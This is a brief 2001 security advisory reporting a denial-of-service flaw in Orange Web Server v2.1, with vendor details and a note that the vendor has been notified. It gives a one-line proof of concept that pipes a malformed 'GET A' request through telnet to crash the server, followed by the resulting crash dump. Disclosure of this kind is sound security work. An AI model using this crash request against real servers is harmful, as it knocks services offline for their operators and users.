Orange Web Server v2.1 DoS

[slipy () B10Z NET]

Introduction:

Orange Web Server v2.1 is a powerful yet light-
weight web server that runs on all Windows 
platforms. Easy to setup and use, Orange Web 
Server can turn any PC into a web server. The httpd 
is based on GoAhead (c) Technology.


The Vendors website is:
http://www.orangesoftware.net/orangewebserver.html


Problem: Denial of Service Attack

Orange Web Server v2.1 is vulnerable to a very 
simple Denial of Service attack where its possible to 
cause the server to shut down at once and cause a 
invalid page fault. This is a very strange DoS, see 
example.


Examples:

echo "GET A" | telnet 192.168.0.20 80

^^ = That simple echo & pipe will cause this:

ORANGEWEBSERVER caused an invalid page fault 
in module ORANGEWEBSERVER.EXE at 
016f:00409694. 
Registers:
EAX=49703d50 CS=016f EIP=00409694 
EFLGS=00010246 EBX=009dfe84 SS=0177 
ESP=009dfbb8 EBP=009dfe8c ECX=00000000 
DS=0177 ESI=00416362 FS=84cf EDX=00000000 
ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24 
Stack dump:
00416350 004094a7 00000000 00416350 ffffffff 
009dfbf0 009dfe8c 009dfe84 00418644 ffffffff 
006d8e8c 00410b62 00000000 00416350 006d949c 
00000000 


Solution:

Vendor has been notified, and waiting for a reply. 

--------------------
b10z HTTPd Advisory
slipy () b10z net

Found: February 27th, 2001.